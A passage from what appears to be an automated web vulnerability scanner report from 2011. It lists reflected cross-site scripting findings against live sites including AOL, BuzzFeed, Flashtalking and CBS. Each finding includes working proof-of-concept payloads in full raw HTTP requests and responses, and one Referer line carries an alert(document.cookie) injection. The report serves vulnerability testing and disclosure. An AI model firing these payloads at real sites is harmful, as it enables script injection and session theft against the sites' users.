GET /pacific/Response.jsp?id=1296756969&c=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa6/2/0/%2a/w%3B235146685%3B0-0%3B17%3B59749070%3B780-320/240%3B40398809/40416596/1%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f93d1a<a>32b91cfbcdc&h=http://s0.2mdn.net&n=148748&i=http://ad.doubleclick.net/imp;v7;/;235146685;0-0;17;59749070;320/240;40398809/40416596/1;;~aopt=2/0/ff/0;~okv=;site=entertainment;dpart=primetime;show=bigbangtheory;feat=full_episodes;feat=rebroadcast;partner=cbs;vid=1777408650;outlet=CBS%20Production;pid=8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y;noAd=;type=ros;format=MPEG4;pos=2;sz=320x240;playerVersion=UVP2.7.1;adv=b;bc=true;slot=a;aseg=;bsg=102083;bsg=102208;bsg=105374;;~cs=h%3f&partner=cbs HTTP/1.1
Host: ocp.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/thunder/canplayer/canplayer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3CE38FFF124B5D96C3F299A61073C266; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404; CBS_ADV_VAL=b%3Bbc%3Dtrue; MADUCAT=1&0206&BK16187&BK16193&BK16567&BK16198&BK14860; mad_rsi_segs=; XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; playerVersion=UVP2.7.1; _PACIFIC_COMMENTS=Ad+System+Call%28ocp.cbs.com%29%3A+http%3A%2F%2Fad.doubleclick.net%2Fad%2Fcan%2Fcbs%2Fp8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y%3Bsite%3Dentertainment%3Bdpart%3Dprimetime%3Bshow%3Dbigbangtheory%3Bfeat%3Dfull_episodes%3Bfeat%3Drebroadcast%3Bpartner%3Dcbs%3Bvid%3D1777408650%3Boutlet%3DCBS%2520Production%3Bpid%3D8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y%3BnoAd%3D%3Btype%3Dros%3Bformat%3DMPEG4%3Bpos%3D2%3Bsz%3D320x240%3BplayerVersion%3DUVP2.7.1%3Badv%3Db%3Bbc%3Dtrue%3Bslot%3Da%3Baseg%3D%3Bord%3D807811%3F; ad_format=MPEG4; PACIFIC_TRACE=c17-ad-xw9.cnet.com.12970246081810.6793216811445366; CBS_MIDROLL_SLOT=2.a; pos=2; PACIFIC_AD_CALL=%2Fvideos.can.com%2Fcbs%2F%2Fent%2Fpt%2Fbbt%2Ffe%2Frb%3Bsite%3Dentertainment%3Bdpart%3Dprimetime%3Bshow%3Dbigbangtheory%3Bfeat%3Dfull_episodes%3Bfeat%3Drebroadcast%3Bpartner%3Dcbs%3Bvid%3D1777408650%3Boutlet%3DCBS+Production%3Bpid%3D8buxD2A6bKEXPle0tw9xXiSNXz7b6o4y%3BnoAd%3D%3Btype%3Dros%3Bformat%3DMPEG4%3Bpos%3D2%3Bsz%3D320x240%3Bord%3D807811%3BplayerVersion%3DUVP2.7.1; xml=vast2; partner=cbs

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:38:18 GMT
Server: Apache-Coyote/1.1
Content-Type: application/xml;charset=ISO-8859-1
Content-Length: 3500
Set-Cookie: JSESSIONID=9CEB649DE56A4E555E5BA5308E6F85B8; Path=/pacific
Set-Cookie: CBS_CAT_EXCL=2%3A; Domain=.cbs.com; Path=/
Set-Cookie: exclude=cat%3Dfinancial; Domain=.cbs.com; Path=/
Set-Cookie: xml=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: partner=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pos=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ad_format=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sz=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: playerVersion=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: PACIFIC_COMMENTS=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: PACIFIC_AD_CALL=""; Domain=.cbs.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<VAST version="2.0">
<Ad id="1296756969">
<InLine>
<AdSystem>DART</AdSystem>
<AdTitle>235146685_BAC_AST_QBKW
...[SNIP]...
<ClickThrough>http://ad.doubleclick.net/click;h=v8/3aa6/2/0/*/w;235146685;0-0;17;59749070;780-320/240;40398809/40416596/1;;~aopt=2/0/ff/0;~sscs=?93d1a<a>32b91cfbcdchttp://ad.doubleclick.net/clk;235299720;59096477;z</ClickThrough>
...[SNIP]...

1.185. http://pglb.buzzfed.com/12659/989cc9ecbfd3d382e27b06d49f58dc6f [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /12659/989cc9ecbfd3d382e27b06d49f58dc6f

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 14885<script>alert(1)</script>c21e4d75bd1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12659/989cc9ecbfd3d382e27b06d49f58dc6f?callback=BF_PARTNER.gate_response14885<script>alert(1)</script>c21e4d75bd1&cb=3913 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.popeater.com/?8e6b4%22-alert(document.cookie)-%227668b18d7c7=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604794
Expires: Sun, 13 Feb 2011 20:54:34 GMT
Date: Sun, 06 Feb 2011 20:54:40 GMT
Connection: close

BF_PARTNER.gate_response14885<script>alert(1)</script>c21e4d75bd1(1242086400);

1.186. http://portal.pf.aol.com/jsonmfus/ws [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://portal.pf.aol.com
Path:   /jsonmfus/ws

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6dc58<script>alert(1)</script>2112900b8a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsonmfus/ws?service=symslist,markets&symbols=E:DJI:$INDU,E:NAI:$COMPX,E:CMI:$INX,E:BSS:(TC10Y,E:ISE:UKX,E:FX1:N225,E:FX1:HSIX,E:FX1:EURUSD,E:FX1:USDJPY,E:DEI:DAX,E:FX1:GBPUSD,E:FX1:USDCHF,E:CMX:/GC\J11,E:NYM:/CL\H11,E:NYM:/PL\J11,E:NYM:/NG\J11,E:NYS:C,E:NYS:BAC,E:NYS:SPY,E:NYS:S,E:NYS:KV.A,E:NYS:KV.B,E:NYS:NPTN,E:NYS:EEE,E:NYS:CPX,E:NYS:DQ,E:NYS:GMXR,E:NYS:LVS&porttype=2&portmax=100&callback=rebuildLiveHash6dc58<script>alert(1)</script>2112900b8a8&rf=http://www.dailyfinance.com HTTP/1.1
Host: portal.pf.aol.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; s_pers=%20s_getnr%3D1297021680436-New%7C1360093680436%3B%20s_nrgvo%3DNew%7C1360093680440%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:47:22 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate, no-transform
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=utf-8
Content-Length: 16235

rebuildLiveHash6dc58<script>alert(1)</script>2112900b8a8({"ResultSet": {
"symslist": [
{
"lu": "http://www.dailyfinance.com/quotes/dow-jones-industrial-average/%24indu/dji",
"c": "+29.89",
"xdn": "DJ Index",
"p": "12,092.15",
"pc": "+0.25"
...[SNIP]...

1.187. http://realestate.aol.com/blog/2011/02/04/million-dollar-home-defaults-just-what-the-doctor-ordered/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://realestate.aol.com
Path:   /blog/2011/02/04/million-dollar-home-defaults-just-what-the-doctor-ordered/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaf12"style%3d"x%3aexpression(alert(1))"c3cb16c7ff was submitted in the REST URL parameter 4. This input was echoed as eaf12"style="x:expression(alert(1))"c3cb16c7ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /blog/2011/02/04eaf12"style%3d"x%3aexpression(alert(1))"c3cb16c7ff/million-dollar-home-defaults-just-what-the-doctor-ordered/ HTTP/1.1
Host: realestate.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:12:04 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:12:04 GMT; path=/
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 63524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--PLUGIN NOTICE: Cache miss or caching is disabled. Parameters Array
(

...[SNIP]...
<input type="hidden" name="referer" value="http://realestate.aol.com:1080/blog/2011/02/04eaf12"style="x:expression(alert(1))"c3cb16c7ff/million-dollar-home-defaults-just-what-the-doctor-ordered/">
...[SNIP]...

1.188. http://realestate.aol.com/blog/2011/02/04/worst-foreclosed-home-vandalism-ever/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://realestate.aol.com
Path:   /blog/2011/02/04/worst-foreclosed-home-vandalism-ever/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5777"a%3d"b"0794e1ec659 was submitted in the REST URL parameter 4. This input was echoed as f5777"a="b"0794e1ec659 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/2011/02/04f5777"a%3d"b"0794e1ec659/worst-foreclosed-home-vandalism-ever/ HTTP/1.1
Host: realestate.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:12:01 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Sat, 06-Feb-2010 20:12:02 GMT; path=/
Keep-Alive: timeout=5, max=999900
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 63211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--PLUGIN NOTICE: Cache miss or caching is disabled. Parameters Array
(

...[SNIP]...
<input type="hidden" name="referer" value="http://realestate.aol.com:1080/blog/2011/02/04f5777"a="b"0794e1ec659/worst-foreclosed-home-vandalism-ever/">
...[SNIP]...

1.189. http://servedby.flashtalking.com/imp/3/14886 [97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the 97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbd12"-alert(1)-"111d3ab201f was submitted in the 97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1253664/0/225/AdId=1428644;BnId=2;itime=23846725;kvpg=aisledash;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93306318;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;kp=87058;nodecode=yes;link=bbd12"-alert(1)-"111d3ab201f&ftx=&fty=&ftadz=&ftscw=&cachebuster=359483.4308605641 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.aisledash.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flashtalkingad1="GUID=11328D1137525B"

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:24:32 GMT
Server: Jetty(6.1.22)
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 811
Via: 1.1 mdw061007 (MII-APC/1.6)


var ftGUID_97125="11328D1137525B";
var ftConfID_97125="0";
var ftParams_97125="click=http://at.atwola.com/adlink/5113/1253664/0/225/AdId=1428644;BnId=2;itime=23846725;kvpg=aisledash;kvugc=0;kvui=e1
...[SNIP]...
50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;kp=87058;nodecode=yes;link=bbd12"-alert(1)-"111d3ab201f&ftx=&fty=&ftadz=&ftscw=&cachebuster=359483.4308605641";
var ftKeyword_97125="";
var ftSegment_97125="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97125/167578/js/j-97125-1
...[SNIP]...

1.190. http://servedby.flashtalking.com/imp/3/14886 [97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the 97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 669f0"-alert(1)-"5792a5b5c84 was submitted in the 97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=669f0"-alert(1)-"5792a5b5c84&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:16 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11326E86B479C3";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:16 GMT
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 758
Via: 1.1 mdw061005 (MII-APC/1.6)


var ftGUID_97126="11326E86B479C3";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=669f0"-alert(1)-"5792a5b5c84&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.5826382339";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-1
...[SNIP]...

1.191. http://servedby.flashtalking.com/imp/3/14886 [cachebuster parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92b2b"-alert(1)-"f12dac9a158 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.582638233992b2b"-alert(1)-"f12dac9a158 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:16 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11327B18B63DDD";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:49:16 GMT
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 758
Via: 1.1 mdw061006 (MII-APC/1.6)


var ftGUID_97126="11327B18B63DDD";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=&cachebuster=710415.582638233992b2b"-alert(1)-"f12dac9a158";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-167568.js" id="ftscript_m97126" name="ftscript_m97126">
...[SNIP]...

1.192. http://servedby.flashtalking.com/imp/3/14886 [ftadz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79af2"-alert(1)-"04fe214699f was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=79af2"-alert(1)-"04fe214699f&ftscw=&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:48:51 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=113270ECF2D3D1";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:48:51 GMT
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript
Cache-Control: no-cache, no-store
pragma: no-cache
Content-Length: 758
Via: 1.1 mdw061004 (MII-APC/1.6)


var ftGUID_97126="113270ECF2D3D1";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=79af2"-alert(1)-"04fe214699f&ftscw=&cachebuster=710415.5826382339";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-167568.js" id="fts
...[SNIP]...

1.193. http://servedby.flashtalking.com/imp/3/14886 [ftscw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 877e4"-alert(1)-"462c4afd1b1 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp/3/14886;97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16if17a0kq0bgd;kr2703=72727;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=877e4"-alert(1)-"462c4afd1b1&cachebuster=710415.5826382339 HTTP/1.1
Host: servedby.flashtalking.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 19:49:04 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=11323EB1B09D0E";Path=/;Domain=flashtalking.com;Expires=Tue, 05-Feb-13 19:49:04 GMT
Cache-Control: no-cache, no-store
Content-Length: 758
content-type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
pragma: no-cache
Via: 1.1 mdw061001 (MII-APC/1.6)


var ftGUID_97126="11323EB1B09D0E";
var ftConfID_97126="0";
var ftParams_97126="click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1428644;BnId=3;itime=21627244;kvpg=dailyfinance;kvugc=0;kvmn
...[SNIP]...
51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204;kp=87058;nodecode=yes;link=&ftx=&fty=&ftadz=&ftscw=877e4"-alert(1)-"462c4afd1b1&cachebuster=710415.5826382339";
var ftKeyword_97126="";
var ftSegment_97126="";

document.write('<scr'+'ipt src="http://cdn.flashtalking.com/tagsv3/97126/167568/js/j-97126-167568.js" id="ftscript_m
...[SNIP]...

1.194. http://servedby.flashtalking.com/imp/3/14886 [ftx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /imp/3/14886

Issue detail

The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b507"-alert(1)-"1359c52bda6 was submitted in the ftx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

